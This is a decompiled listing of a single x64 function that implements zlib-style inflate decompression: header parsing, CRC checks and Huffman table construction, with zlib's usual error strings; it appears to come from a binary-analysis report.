                                                                                                                                                              			E00007FF77FF7191CDB04(signed int __ebx, void* __edi, void* __ebp, signed char* __rsi, signed long long __r8, void* __r9, void* __r11, signed long long __r12, void* __r13, void* __r14, long long __r15) {
				signed int _t532;
				signed int _t542;
				signed int _t543;
				intOrPtr _t554;
				void* _t555;
				signed int _t575;
				signed int _t578;
				unsigned int _t580;
				unsigned int _t584;
				signed int _t600;
				signed int _t602;
				signed int _t609;
				signed char _t614;
				signed int _t627;
				signed char _t632;
				unsigned int _t639;
				void* _t640;
				signed int _t649;
				signed int _t663;
				signed int _t672;
				signed int _t674;
				signed int _t676;
				signed int _t678;
				signed int _t680;
				signed int _t682;
				signed int _t683;
				void* _t684;
				signed int _t687;
				signed int _t688;
				signed int _t689;
				signed int _t691;
				void* _t692;
				signed int _t693;
				void* _t694;
				signed int _t695;
				void* _t696;
				signed int _t697;
				void* _t698;
				signed int _t700;
				signed int _t701;
				void* _t702;
				signed int _t704;
				signed int _t705;
				void* _t706;
				signed int _t708;
				void* _t709;
				signed int _t710;
				signed int _t711;
				void* _t712;
				signed int _t714;
				void* _t715;
				signed int _t716;
				signed int _t718;
				signed int _t719;
				signed int _t723;
				signed char _t735;
				signed char _t753;
				signed char _t756;
				signed int _t758;
				signed char _t759;
				signed int _t763;
				signed char _t780;
				signed char _t784;
				signed char _t814;
				signed char _t817;
				signed char _t823;
				signed char _t847;
				signed char _t850;
				signed char _t856;
				void* _t858;
				intOrPtr _t859;
				void* _t863;
				signed int _t874;
				signed int _t890;
				signed char _t895;
				void* _t897;
				void* _t901;
				void* _t905;
				signed char _t917;
				signed char _t922;
				intOrPtr _t924;
				void* _t926;
				void* _t927;
				void* _t928;
				signed char _t929;
				void* _t930;
				void* _t931;
				void* _t932;
				void* _t933;
				void* _t934;
				intOrPtr _t935;
				void* _t936;
				void* _t937;
				void* _t938;
				void* _t939;
				void* _t940;
				void* _t941;
				void* _t942;
				intOrPtr _t943;
				intOrPtr _t944;
				void* _t945;
				void* _t946;
				void* _t947;
				void* _t948;
				void* _t949;
				void* _t950;
				void* _t951;
				void* _t953;
				unsigned int _t955;
				signed int _t956;
				unsigned int _t957;
				signed int _t959;
				unsigned int _t960;
				signed char _t962;
				signed int _t966;
				signed int _t971;
				unsigned int _t972;
				unsigned int _t975;
				unsigned int _t976;
				signed int _t978;
				signed int _t979;
				signed int _t980;
				signed int _t981;
				unsigned int _t982;
				unsigned int _t984;
				unsigned int _t989;
				unsigned int _t992;
				unsigned int _t995;
				signed int _t998;
				unsigned int _t999;
				unsigned int _t1002;
				signed int _t1004;
				unsigned int _t1005;
				signed int _t1008;
				unsigned int _t1009;
				signed int _t1011;
				unsigned int _t1012;
				signed int* _t1019;
				intOrPtr _t1040;
				intOrPtr _t1069;
				void* _t1085;
				void* _t1120;
				void* _t1132;
				intOrPtr _t1207;
				intOrPtr _t1209;
				intOrPtr _t1210;
				intOrPtr _t1211;
				intOrPtr _t1212;
				intOrPtr _t1213;
				intOrPtr _t1214;
				intOrPtr _t1216;
				signed long long _t1221;
				long long _t1222;
				signed long long _t1225;
				signed long long _t1226;
				long long _t1229;
				signed long long _t1233;
				signed long long _t1235;
				signed long long _t1238;
				void* _t1241;
				intOrPtr _t1243;
				void* _t1244;
				signed long long _t1248;
				signed long long _t1249;
				signed long long _t1250;
				signed long long _t1252;
				signed long long _t1253;
				signed long long _t1254;
				signed int* _t1255;
				intOrPtr _t1260;
				intOrPtr _t1263;
				intOrPtr _t1265;
				signed char* _t1266;
				signed char* _t1283;
				signed char* _t1284;
				signed char* _t1285;
				signed char* _t1286;
				signed char* _t1287;
				signed char* _t1288;
				signed char* _t1289;
				signed char* _t1290;
				signed char* _t1291;
				signed char* _t1292;
				signed char* _t1294;
				signed char* _t1295;
				signed char* _t1296;
				signed char* _t1297;
				signed char* _t1298;
				signed char* _t1299;
				signed char* _t1301;
				signed char* _t1302;
				signed char* _t1303;
				signed char* _t1304;
				signed char* _t1305;
				signed char* _t1306;
				signed char* _t1307;
				signed char* _t1308;
				void* _t1311;
				void* _t1313;
				signed long long _t1315;
				intOrPtr _t1317;
				char* _t1324;
				char* _t1325;
				long long _t1326;
				intOrPtr _t1327;
				intOrPtr _t1328;
				intOrPtr _t1329;
				intOrPtr _t1330;
				void* _t1331;
				signed long long _t1332;
				long long _t1339;

				_t1332 = __r12;
				_t1331 = __r11;
				_t1315 = __r8;
				if (__ebx - 0x10 >= 0) goto 0x191cdb2e;
				if (__edi == 0) goto 0x191ce19f;
				_t926 = __edi - 1;
				_t955 = __ebp + (( *__rsi & 0x000000ff) << __ebx);
				_t1283 =  &(__rsi[1]);
				if (__ebx + 8 - 0x10 < 0) goto 0x191cdb10;
				 *(__r13 + 0x18) = _t955;
				if (bpl == 8) goto 0x191cdb51;
				 *(__r12 + 0x20) = "unknown compression method";
				 *((intOrPtr*)(__r13 + 8)) = 0x3f51;
				goto 0x191ce001;
				if ((_t955 & 0x0000e000) == 0) goto 0x191cdb72;
				 *(__r12 + 0x20) = "unknown header flags set";
				 *((intOrPtr*)(__r13 + 8)) = 0x3f51;
				goto 0x191ce001;
				_t1255 =  *((intOrPtr*)(__r13 + 0x28));
				_t723 = _t955 >> 8;
				_t1019 = _t1255;
				if (_t1019 == 0) goto 0x191cdb8d;
				 *_t1255 = _t723 & 0x00000001;
				asm("bt eax, 0x9");
				if (_t1019 >= 0) goto 0x191cdbbb;
				if (( *(__r13 + 0x10) & 0x00000004) == 0) goto 0x191cdbbb;
				 *(_t1313 + 0x30) = bpl;
				 *(_t1313 + 0x31) = _t723;
				r8d = 2;
				 *(__r13 + 0x20) = E00007FF77FF7191CF4C0(_t1313 + 0x30);
				_t956 = r15d;
				 *((intOrPtr*)(__r13 + 8)) = 0x3f36;
				_t672 = r15d;
				if (_t672 - 0x20 >= 0) goto 0x191cdbee;
				if (_t926 == 0) goto 0x191ce19f;
				_t927 = _t926 - 1;
				_t957 = _t956 + (( *_t1283 & 0x000000ff) << _t672);
				_t1284 =  &(_t1283[1]);
				if (_t672 + 8 - 0x20 < 0) goto 0x191cdbd0;
				_t1207 =  *((intOrPtr*)(__r13 + 0x28));
				if (_t1207 == 0) goto 0x191cdbfa;
				 *(_t1207 + 4) = _t957;
				if (( *(__r13 + 0x18) & 0x00000200) == 0) goto 0x191cdc42;
				if (( *(__r13 + 0x10) & 0x00000004) == 0) goto 0x191cdc42;
				 *(_t1313 + 0x30) = bpl;
				 *(_t1313 + 0x31) = _t957 >> 8;
				r8d = 4;
				 *((char*)(_t1313 + 0x32)) = _t957 >> 0x10;
				 *(_t1313 + 0x33) = bpl;
				 *(__r13 + 0x20) = E00007FF77FF7191CF4C0(_t1313 + 0x30);
				_t959 = r15d;
				 *((intOrPtr*)(__r13 + 8)) = 0x3f37;
				_t674 = r15d;
				if (_t674 - 0x10 >= 0) goto 0x191cdc75;
				if (_t927 == 0) goto 0x191ce19f;
				_t928 = _t927 - 1;
				_t960 = _t959 + (( *_t1284 & 0x000000ff) << _t674);
				_t1285 =  &(_t1284[1]);
				if (_t674 + 8 - 0x10 < 0) goto 0x191cdc57;
				_t1243 =  *((intOrPtr*)(__r13 + 0x28));
				if (_t1243 == 0) goto 0x191cdc93;
				 *(_t1243 + 8) = bpl & 0xffffffff;
				 *( *((intOrPtr*)(__r13 + 0x28)) + 0xc) = _t960 >> 8;
				goto 0x191cdc98;
				if (( *(__r13 + 0x18) & 0x00000200) == 0) goto 0x191cdcca;
				if (( *(__r13 + 0x10) & 0x00000004) == 0) goto 0x191cdcca;
				 *(_t1313 + 0x30) = bpl;
				 *(_t1313 + 0x31) = _t960 >> 8;
				r8d = 2;
				 *(__r13 + 0x20) = E00007FF77FF7191CF4C0(_t1313 + 0x30);
				 *((intOrPtr*)(__r13 + 8)) = 0x3f38;
				_t676 = r15d;
				if (( *(__r13 + 0x18) & 0x00000400) == 0) goto 0x191cdd53;
				if (_t676 - 0x10 >= 0) goto 0x191cdd05;
				if (_t928 == 0) goto 0x191ce19f;
				_t929 = _t928 - 1;
				_t962 = r15d + (( *_t1285 & 0x000000ff) << _t676);
				_t1286 =  &(_t1285[1]);
				if (_t676 + 8 - 0x10 < 0) goto 0x191cdce7;
				_t1209 =  *((intOrPtr*)(__r13 + 0x28));
				 *(__r13 + 0x50) = _t962;
				if (_t1209 == 0) goto 0x191cdd15;
				 *(_t1209 + 0x18) = _t962;
				if (( *(__r13 + 0x18) & 0x00000200) == 0) goto 0x191cdd4b;
				if (( *(__r13 + 0x10) & 0x00000004) == 0) goto 0x191cdd4b;
				 *(_t1313 + 0x30) = bpl;
				r8d = 2;
				 *(_t1313 + 0x31) = bpl;
				 *(__r13 + 0x20) = E00007FF77FF7191CF4C0(_t1313 + 0x30);
				_t678 = r15d;
				goto 0x191cdd60;
				_t1210 =  *((intOrPtr*)(__r13 + 0x28));
				_t1040 = _t1210;
				if (_t1040 == 0) goto 0x191cdd60;
				 *((long long*)(_t1210 + 0x10)) = __r15;
				 *((intOrPtr*)(__r13 + 8)) = 0x3f39;
				asm("bt eax, 0xa");
				if (_t1040 >= 0) goto 0x191cde06;
				_t735 =  *(__r13 + 0x50);
				r14d = _t929;
				r14d =  <=  ? _t735 : r14d;
				if (r14d == 0) goto 0x191cddfe;
				_t1260 =  *((intOrPtr*)(__r13 + 0x28));
				if (_t1260 == 0) goto 0x191cddcd;
				_t1327 =  *((intOrPtr*)(_t1260 + 0x10));
				if (_t1327 == 0) goto 0x191cddcd;
				r8d =  *(_t1260 + 0x1c);
				r9d =  *(_t1260 + 0x18);
				r9d = r9d - _t735;
				_t519 =  >  ? r8d - r9d : r14d;
				_t1244 = _t1243 + _t1327;
				r8d =  >  ? r8d - r9d : r14d;
				E00007FF77FF7191D4380();
				asm("bt eax, 0x9");
				if (__r14 + __r9 - r8d >= 0) goto 0x191cdded;
				if (( *(__r13 + 0x10) & 0x00000004) == 0) goto 0x191cdded;
				r8d = r14d;
				 *(__r13 + 0x20) = E00007FF77FF7191CF4C0(_t1286);
				_t930 = _t929 - r14d;
				_t1287 =  &(_t1286[_t1210]);
				 *(__r13 + 0x50) =  *(__r13 + 0x50) - r14d;
				if ( *(__r13 + 0x50) != 0) goto 0x191ce19f;
				 *(__r13 + 0x50) = r15d;
				 *((intOrPtr*)(__r13 + 8)) = 0x3f3a;
				if (( *(__r13 + 0x18) & 0x00000800) == 0) goto 0x191cdea3;
				if (_t930 == 0) goto 0x191ce19f;
				r14d = r15d;
				r14d = r14d + 1;
				r15d =  *(_t1210 + _t1287) & 0x000000ff;
				_t1211 =  *((intOrPtr*)(__r13 + 0x28));
				if (_t1211 == 0) goto 0x191cde5e;
				_t1263 =  *((intOrPtr*)(_t1211 + 0x20));
				if (_t1263 == 0) goto 0x191cde5e;
				if ( *(__r13 + 0x50) -  *((intOrPtr*)(_t1211 + 0x28)) >= 0) goto 0x191cde5e;
				 *((intOrPtr*)(_t1244 + _t1263)) = r15b;
				 *(__r13 + 0x50) =  *(__r13 + 0x50) + 1;
				if (r15b == 0) goto 0x191cde68;
				if (r14d - _t930 < 0) goto 0x191cde30;
				if (( *(__r13 + 0x18) & 0x00000200) == 0) goto 0x191cde8c;
				if (( *(__r13 + 0x10) & 0x00000004) == 0) goto 0x191cde8c;
				r8d = r14d;
				 *(__r13 + 0x20) = E00007FF77FF7191CF4C0(_t1287);
				_t931 = _t930 - r14d;
				_t1288 =  &(_t1287[_t1211]);
				if (r15b != 0) goto 0x191ce19f;
				r15d = 0;
				goto 0x191cdeb0;
				_t1212 =  *((intOrPtr*)(__r13 + 0x28));
				if (_t1212 == 0) goto 0x191cdeb0;
				 *((long long*)(_t1212 + 0x20)) = __r15;
				 *(__r13 + 0x50) = r15d;
				 *((intOrPtr*)(__r13 + 8)) = 0x3f3b;
				if (( *(__r13 + 0x18) & 0x00001000) == 0) goto 0x191cdf44;
				if (_t931 == 0) goto 0x191ce19f;
				r14d = r15d;
				r14d = r14d + 1;
				r15d =  *(_t1212 + _t1288) & 0x000000ff;
				_t1213 =  *((intOrPtr*)(__r13 + 0x28));
				if (_t1213 == 0) goto 0x191cdeff;
				_t1265 =  *((intOrPtr*)(_t1213 + 0x30));
				if (_t1265 == 0) goto 0x191cdeff;
				if ( *(__r13 + 0x50) -  *((intOrPtr*)(_t1213 + 0x38)) >= 0) goto 0x191cdeff;
				 *((intOrPtr*)(_t1244 + _t1265)) = r15b;
				 *(__r13 + 0x50) =  *(__r13 + 0x50) + 1;
				if (r15b == 0) goto 0x191cdf09;
				if (r14d - _t931 < 0) goto 0x191cded1;
				if (( *(__r13 + 0x18) & 0x00000200) == 0) goto 0x191cdf2d;
				if (( *(__r13 + 0x10) & 0x00000004) == 0) goto 0x191cdf2d;
				r8d = r14d;
				_t1266 = _t1288;
				 *(__r13 + 0x20) = E00007FF77FF7191CF4C0(_t1266);
				_t932 = _t931 - r14d;
				_t1289 =  &(_t1288[_t1213]);
				if (r15b != 0) goto 0x191ce19f;
				r15d = 0;
				goto 0x191cdf51;
				_t1214 =  *((intOrPtr*)(__r13 + 0x28));
				_t1069 = _t1214;
				if (_t1069 == 0) goto 0x191cdf51;
				 *((long long*)(_t1214 + 0x30)) = __r15;
				r10d =  *(_t1313 + 0xb8);
				 *((intOrPtr*)(__r13 + 8)) = 0x3f3c;
				asm("bt edx, 0x9");
				if (_t1069 >= 0) goto 0x191cdfba;
				if (_t678 - 0x10 >= 0) goto 0x191cdf8e;
				if (_t932 == 0) goto 0x191ce19f;
				_t933 = _t932 - 1;
				_t1290 =  &(_t1289[1]);
				if (_t678 + 8 - 0x10 < 0) goto 0x191cdf70;
				if (( *(__r13 + 0x10) & 0x00000004) == 0) goto 0x191cdfb4;
				if (r15d + (( *_t1289 & 0x000000ff) << _t678) == ( *(__r13 + 0x20) & 0x0000ffff)) goto 0x191cdfb4;
				 *(__r12 + 0x20) = "header crc mismatch";
				 *((intOrPtr*)(__r13 + 8)) = 0x3f51;
				goto 0x191cdffc;
				_t966 = r15d;
				_t680 = r15d;
				_t1216 =  *((intOrPtr*)(__r13 + 0x28));
				if (_t1216 == 0) goto 0x191cdfd7;
				 *(_t1216 + 0x3c) =  *(__r13 + 0x18) >> 0x00000009 & 0x00000001;
				_t1217 =  *((intOrPtr*)(__r13 + 0x28));
				 *( *((intOrPtr*)(__r13 + 0x28)) + 0x40) = 1;
				r8d = 0;
				_t532 = E00007FF77FF7191CF4C0(_t1266);
				 *(__r13 + 0x20) = _t532;
				 *(__r12 + 0x4c) = _t532;
				 *((intOrPtr*)(__r13 + 8)) = 0x3f3f;
				r10d =  *(_t1313 + 0xb8);
				_t1317 =  *((intOrPtr*)(_t1313 + 0x40));
				_t152 = _t1266 - 0x3f34; // 0x14
				if (_t152 - 0x1f > 0) goto 0x191cf005;
				r8d =  *(_t1313 + 0xa0);
				r15d = 0;
				r14d =  *(_t1313 + 0xa8);
				if (_t680 - 0x20 >= 0) goto 0x191ce04f;
				if (_t933 == 0) goto 0x191ce19f;
				_t934 = _t933 - 1;
				_t967 = _t966 + (( *_t1290 & 0x000000ff) << _t680);
				_t1291 =  &(_t1290[1]);
				if (_t680 + 8 - 0x20 < 0) goto 0x191ce031;
				_t682 = r15d;
				_t542 = (_t966 + (( *_t1290 & 0x000000ff) << _t680) >> 0x00000008 & 0x0000ff00) + ((_t966 + (( *_t1290 & 0x000000ff) << _t680) & 0x0000ff00) + (_t967 << 0x10) << 8) + (_t967 >> 0x18);
				 *(__r13 + 0x20) = _t542;
				 *(__r12 + 0x4c) = _t542;
				 *((intOrPtr*)(__r13 + 8)) = 0x3f3e;
				if ( *((intOrPtr*)(__r13 + 0x14)) == 0) goto 0x191ceec0;
				r8d = 0;
				_t543 = E00007FF77FF7191CF7F0(0, _t1217, _t1266, __r8, _t1317);
				r10d =  *(_t1313 + 0xb8);
				 *(__r13 + 0x20) = _t543;
				 *(__r12 + 0x4c) = _t543;
				 *((intOrPtr*)(__r13 + 8)) = 0x3f3f;
				if (__r14 - 5 - 1 <= 0) goto 0x191ce19f;
				if ( *(__r13 + 0xc) == 0) goto 0x191ce0e3;
				 *((intOrPtr*)(__r13 + 8)) = 0x3f4e;
				_t753 = _t682 & 0x00000007;
				_t683 = _t682 - _t753;
				goto 0x191cdffc;
				if (_t683 - 3 >= 0) goto 0x191ce106;
				if (_t934 == 0) goto 0x191ce19f;
				_t935 = _t934 - 1;
				_t971 = (r15d >> _t753) + (( *_t1291 & 0x000000ff) << _t683);
				_t1292 =  &(_t1291[1]);
				_t684 = _t683 + 8;
				_t1085 = _t684 - 3;
				if (_t1085 < 0) goto 0x191ce0e8;
				_t972 = _t971 >> 1;
				 *(__r13 + 0xc) = _t971 & 0x00000001;
				if (_t1085 == 0) goto 0x191ce23d;
				if (_t1085 == 0) goto 0x191ce161;
				if (_t1085 == 0) goto 0x191ce14e;
				if ((_t972 & 0x00000003) != 1) goto 0x191ce245;
				 *(__r12 + 0x20) = "invalid block type";
				 *((intOrPtr*)(__r13 + 8)) = 0x3f51;
				goto 0x191cdffc;
				 *((intOrPtr*)(__r13 + 8)) = 0x3f44;
				goto 0x191cdffc;
				 *(__r13 + 0x70) = 9;
				 *((long long*)(__r13 + 0x60)) = 0x191fec40;
				 *((long long*)(__r13 + 0x68)) = 0x191ff440;
				 *((intOrPtr*)(__r13 + 0x74)) = 5;
				 *((intOrPtr*)(__r13 + 8)) = 0x3f47;
				if (r14d != 6) goto 0x191ce245;
				_t975 = _t972 >> 2 >> 2 >> 2;
				_t687 = _t684 + 0x2fffffff7;
				r14d =  *(_t1313 + 0xa0);
				r15d =  *(_t1313 + 0xb0);
				 *((long long*)(__r12 + 0x10)) =  *((intOrPtr*)(_t1313 + 0x40));
				 *(__r12 + 0x18) =  *(_t1313 + 0xb8);
				 *__r12 = _t1292;
				 *((intOrPtr*)(__r12 + 8)) = _t935;
				 *(__r13 + 0x48) = _t975;
				 *(__r13 + 0x4c) = _t687;
				if ( *((intOrPtr*)(__r13 + 0x34)) != 0) goto 0x191ce20e;
				if (r14d ==  *(__r12 + 0x18)) goto 0x191cef31;
				_t554 =  *((intOrPtr*)(__r13 + 8));
				if (_t554 - 0x3f51 >= 0) goto 0x191cef31;
				if (_t554 - 0x3f4e < 0) goto 0x191ce20e;
				if ( *(_t1313 + 0xa8) == 4) goto 0x191cef31;
				r8d = r14d;
				r8d = r8d -  *(__r12 + 0x18);
				_t555 = E00007FF77FF7191CF3B0(0x191ff440, _t1241, __r12,  *((intOrPtr*)(__r12 + 0x10)), _t1311); // executed
				if (_t555 == 0) goto 0x191cef31;
				 *((intOrPtr*)(__r13 + 8)) = 0x3f52;
				goto 0x191cf00a;
				 *((intOrPtr*)(__r13 + 8)) = 0x3f41;
				_t976 = _t975 >> 2;
				_t688 = _t687 + 0xfffffffd;
				_t756 = _t688 & 0x00000007;
				_t689 = _t688 - _t756;
				if (_t689 - 0x20 >= 0) goto 0x191ce27e;
				if (_t935 == 0) goto 0x191ce19f;
				_t936 = _t935 - 1;
				_t978 = (_t976 >> _t756) + (( *_t1292 & 0x000000ff) << _t689);
				if (_t689 + 8 - 0x20 < 0) goto 0x191ce260;
				_t758 = _t978 & 0x0000ffff;
				if (_t758 ==  !_t978 >> 0x10) goto 0x191ce2a5;
				_t1221 = "invalid stored block lengths";
				 *(__r12 + 0x20) = _t1221;
				 *((intOrPtr*)(__r13 + 8)) = 0x3f51;
				goto 0x191ce001;
				 *(__r13 + 0x50) = _t758;
				_t979 = r15d;
				 *((intOrPtr*)(__r13 + 8)) = 0x3f42;
				_t691 = r15d;
				if (r14d == 6) goto 0x191ce19f;
				 *((intOrPtr*)(__r13 + 8)) = 0x3f43;
				_t759 =  *(__r13 + 0x50);
				if (_t759 == 0) goto 0x191ce32b;
				r14d = r10d;
				_t563 =  <=  ? _t759 : _t936;
				r14d =  <=  ?  <=  ? _t759 : _t936 : r14d;
				if (r14d == 0) goto 0x191ce19f;
				r8d = r14d;
				E00007FF77FF7191D4380();
				r10d =  *(_t1313 + 0xb8);
				_t937 = _t936 - r14d;
				r10d = r10d - r14d;
				 *(_t1313 + 0xb8) = r10d;
				_t1294 =  &(( &(_t1292[1]))[_t1221]);
				 *((long long*)(_t1313 + 0x40)) =  *((intOrPtr*)(_t1313 + 0x40)) + _t1221;
				 *(__r13 + 0x50) =  *(__r13 + 0x50) - r14d;
				goto 0x191ce001;
				 *((intOrPtr*)(__r13 + 8)) = 0x3f3f;
				if (_t691 - 0xe >= 0) goto 0x191ce35e;
				if (_t937 == 0) goto 0x191ce19f;
				_t938 = _t937 - 1;
				_t980 = _t979 + (( *_t1294 & 0x000000ff) << _t691);
				_t1295 =  &(_t1294[1]);
				_t692 = _t691 + 8;
				if (_t692 - 0xe < 0) goto 0x191ce340;
				_t693 = _t692 + 0xfffffff2;
				_t981 = _t980 >> 5;
				_t763 = (_t980 & 0x0000001f) + 0x101;
				_t982 = _t981 >> 5;
				 *(__r13 + 0x7c) = _t763;
				_t890 = (_t981 & 0x0000001f) + 1;
				 *(__r13 + 0x80) = _t890;
				 *((intOrPtr*)(__r13 + 0x78)) = (_t982 & 0x0000000f) + 4;
				if (_t763 - 0x11e > 0) goto 0x191ce4c0;
				if (_t890 - 0x1e > 0) goto 0x191ce4c0;
				 *(__r13 + 0x84) = r15d;
				 *((intOrPtr*)(__r13 + 8)) = 0x3f45;
				if ( *(__r13 + 0x84) -  *((intOrPtr*)(__r13 + 0x78)) >= 0) goto 0x191ce428;
				if (_t693 - 3 >= 0) goto 0x191ce3ee;
				if (_t938 == 0) goto 0x191ce19f;
				_t939 = _t938 - 1;
				_t984 = (_t982 >> 4) + (( *_t1295 & 0x000000ff) << _t693);
				_t1296 =  &(_t1295[1]);
				_t694 = _t693 + 8;
				if (_t694 - 3 < 0) goto 0x191ce3d0;
				_t695 = _t694 + 0xfffffffd;
				 *(__r13 + 0x90 + _t1221 * 2) = _t984 & 7;
				 *(__r13 + 0x84) =  *(__r13 + 0x84) + 1;
				_t575 =  *(__r13 + 0x84);
				if (_t575 -  *((intOrPtr*)(__r13 + 0x78)) < 0) goto 0x191ce3c4;
				if (_t575 - 0x13 >= 0) goto 0x191ce45a;
				 *(__r13 + 0x90 + _t1221 * 2) = r15w;
				 *(__r13 + 0x84) =  *(__r13 + 0x84) + 1;
				if ( *(__r13 + 0x84) - 0x13 < 0) goto 0x191ce430;
				_t1248 = __r13 + 0x70;
				_t1222 = __r13 + 0x550;
				 *_t1248 = 7;
				 *((long long*)(__r13 + 0x60)) = _t1222;
				 *((long long*)(__r13 + 0x88)) = _t1222;
				 *((long long*)(_t1313 + 0x28)) = __r13 + 0x310;
				 *(_t1313 + 0x20) = _t1248;
				_t241 = _t1248 + 0x13; // 0x13
				r8d = _t241;
				_t578 = E00007FF77FF7191CFB00(0, __r13 + 0x90, _t1311, __r13 + 0x88, __r12);
				 *(_t1313 + 0xb0) = _t578;
				if (_t578 == 0) goto 0x191ce4d9;
				 *(_t1332 + 0x20) = "invalid code lengths set";
				 *((intOrPtr*)(__r13 + 8)) = 0x3f51;
				goto 0x191cdff4;
				_t1225 = "too many length or distance symbols";
				 *(_t1332 + 0x20) = _t1225;
				 *((intOrPtr*)(__r13 + 8)) = 0x3f51;
				goto 0x191ce001;
				 *(__r13 + 0x84) = r15d;
				 *((intOrPtr*)(__r13 + 8)) = 0x3f46;
				r10d =  *(__r13 + 0x7c);
				if ( *(__r13 + 0x84) -  *(__r13 + 0x80) + r10d >= 0) goto 0x191ce702;
				r9d = 1;
				_t1328 =  *((intOrPtr*)(__r13 + 0x60));
				r9d = r9d <<  *(__r13 + 0x70);
				r9d = r9d - 1;
				_t1249 = _t1248 & _t1225;
				_t580 =  *(_t1328 + _t1249 * 4);
				r8d = _t580;
				r8d = r8d >> 0x10;
				 *(_t1313 + 0x34) = _t580;
				if ((_t580 >> 0x00000008 & 0x000000ff) - _t695 <= 0) goto 0x191ce583;
				if (_t939 == 0) goto 0x191ce19f;
				_t940 = _t939 - 1;
				_t1297 =  &(_t1296[1]);
				_t696 = _t695 + 8;
				_t1226 = _t1225 & _t1249;
				_t584 =  *(_t1328 + _t1226 * 4);
				_t895 = _t584 >> 8;
				r8d = _t584;
				r8d = r8d >> 0x10;
				 *(_t1313 + 0x34) = _t584;
				if ((_t895 & 0x000000ff) - _t696 > 0) goto 0x191ce547;
				_t1120 = r8w - 0x10;
				if (_t1120 >= 0) goto 0x191ce5ba;
				_t697 = _t696 - (_t895 & 0x000000ff);
				 *((short*)(__r13 + 0x90 + _t1249 * 2)) = _t584 >> 0x10;
				 *(__r13 + 0x84) =  *(__r13 + 0x84) + 1;
				r8d =  *(__r13 + 0x84);
				goto 0x191ce6e7;
				if (_t1120 != 0) goto 0x191ce619;
				_t897 = (_t895 & 0x000000ff) + 2;
				if (_t697 - _t897 >= 0) goto 0x191ce5e3;
				if (_t940 == 0) goto 0x191ce19f;
				_t941 = _t940 - 1;
				_t1298 =  &(_t1297[1]);
				_t698 = _t697 + 8;
				if (_t698 - _t897 < 0) goto 0x191ce5c6;
				_t780 =  *(_t1313 + 0x35) & 0x000000ff;
				_t989 = ((_t984 >> 3) + (( *_t1296 & 0x000000ff) << _t695) >> (_t895 & 0x000000ff)) + (( *_t1297 & 0x000000ff) << _t697) >> _t780;
				if ( *(__r13 + 0x84) == 0) goto 0x191ce732;
				_t700 = _t698 - _t780 + 0xfffffffe;
				r9d =  *(__r13 + 0x90 + _t1226 * 2) & 0x0000ffff;
				goto 0x191ce6a3;
				if (r8w != 0x11) goto 0x191ce660;
				_t901 = (_t989 & 0x00000003) + 6;
				if (_t700 - _t901 >= 0) goto 0x191ce644;
				if (_t941 == 0) goto 0x191ce19f;
				_t942 = _t941 - 1;
				_t1299 =  &(_t1298[1]);
				_t701 = _t700 + 8;
				if (_t701 - _t901 < 0) goto 0x191ce627;
				_t992 = (_t989 >> 2) + (( *_t1298 & 0x000000ff) << _t700) >> ( *(_t1313 + 0x35) & 0x000000ff);
				r9d = r15d;
				goto 0x191ce69f;
				_t905 = (_t992 & 0x00000007) + 0xa;
				if (_t701 - _t905 >= 0) goto 0x191ce684;
				if (_t942 == 0) goto 0x191ce19f;
				_t943 = _t942 - 1;
				_t702 = _t701 + 8;
				if (_t702 - _t905 < 0) goto 0x191ce667;
				_t784 =  *(_t1313 + 0x35) & 0x000000ff;
				_t995 = (_t992 >> 3) + (( *_t1299 & 0x000000ff) << _t701) >> _t784;
				r9d = r15w & 0xffffffff;
				_t1132 =  *(__r13 + 0x84) + (_t995 & 0x0000007f) + 0xb -  *(__r13 + 0x80) +  *(__r13 + 0x7c);
				if (_t1132 > 0) goto 0x191ce732;
				 *(__r13 + 0x90 + _t1226 * 2) = r9w;
				r8d =  *(__r13 + 0x84);
				r8d = __r8 + 1;
				 *(__r13 + 0x84) = r8d;
				if (_t1132 != 0) goto 0x191ce6c0;
				r10d =  *(__r13 + 0x7c);
				if (r8d -  *(__r13 + 0x80) + r10d < 0) goto 0x191ce510;
				if ( *((intOrPtr*)(__r13 + 8)) == 0x3f51) goto 0x191cdff4;
				if ( *((short*)(__r13 + 0x290)) != 0) goto 0x191ce74b;
				 *(_t1332 + 0x20) = "invalid code -- missing end-of-block";
				 *((intOrPtr*)(__r13 + 8)) = 0x3f51;
				goto 0x191cdff4;
				 *(_t1332 + 0x20) = "invalid bit length repeat";
				 *((intOrPtr*)(__r13 + 8)) = 0x3f51;
				goto 0x191cdff4;
				_t1229 = __r13 + 0x550;
				 *(__r13 + 0x70) = 9;
				 *((long long*)(__r13 + 0x88)) = _t1229;
				_t1339 = __r13 + 0x310;
				 *((long long*)(__r13 + 0x60)) = _t1229;
				 *((long long*)(_t1313 + 0x28)) = _t1339;
				 *(_t1313 + 0x20) = __r13 + 0x70;
				r8d = r10d;
				_t600 = E00007FF77FF7191CFB00(1, __r13 + 0x90, _t1311, __r13 + 0x88, _t1332);
				 *(_t1313 + 0xb0) = _t600;
				if (_t600 == 0) goto 0x191ce7b9;
				 *(_t1332 + 0x20) = "invalid literal/lengths set";
				 *((intOrPtr*)(__r13 + 8)) = 0x3f51;
				goto 0x191cdff4;
				_t1232 =  *((intOrPtr*)(__r13 + 0x88));
				_t1250 = __r13 + 0x74;
				r8d =  *(__r13 + 0x80);
				 *((long long*)(__r13 + 0x68)) =  *((intOrPtr*)(__r13 + 0x88));
				 *_t1250 = 6;
				 *((long long*)(_t1313 + 0x28)) = _t1339;
				 *(_t1313 + 0x20) = _t1250;
				_t602 = E00007FF77FF7191CFB00(2, 0x90 + _t1232 * 2 + __r13, _t1311, __r13 + 0x88, _t1332);
				 *(_t1313 + 0xb0) = _t602;
				r15d = _t602;
				if (_t602 == 0) goto 0x191ce826;
				_t1233 = "invalid distances set";
				 *(_t1332 + 0x20) = _t1233;
				 *((intOrPtr*)(__r13 + 8)) = 0x3f51;
				goto 0x191cdff4;
				 *((intOrPtr*)(__r13 + 8)) = 0x3f47;
				if ( *(_t1313 + 0xa8) == 6) goto 0x191cef24;
				r8d =  *(_t1313 + 0xa0);
				r15d = 0;
				r10d =  *(_t1313 + 0xb8);
				 *((intOrPtr*)(__r13 + 8)) = 0x3f48;
				if (_t943 - 6 < 0) goto 0x191ce8d8;
				if (r10d - 0x102 < 0) goto 0x191ce8d8;
				 *((long long*)(_t1332 + 0x10)) =  *((intOrPtr*)(_t1313 + 0x40));
				_t1252 = _t1332;
				 *(_t1332 + 0x18) = r10d;
				 *_t1332 =  &(_t1299[1]);
				 *((intOrPtr*)(_t1332 + 8)) = _t943;
				 *(__r13 + 0x48) = _t995 >> 7;
				 *(__r13 + 0x4c) = _t702 + 0xfffffff9 - _t784;
				E00007FF77FF7191D00C0(r8d, _t953, _t1233, _t1252, _t1328, _t1331);
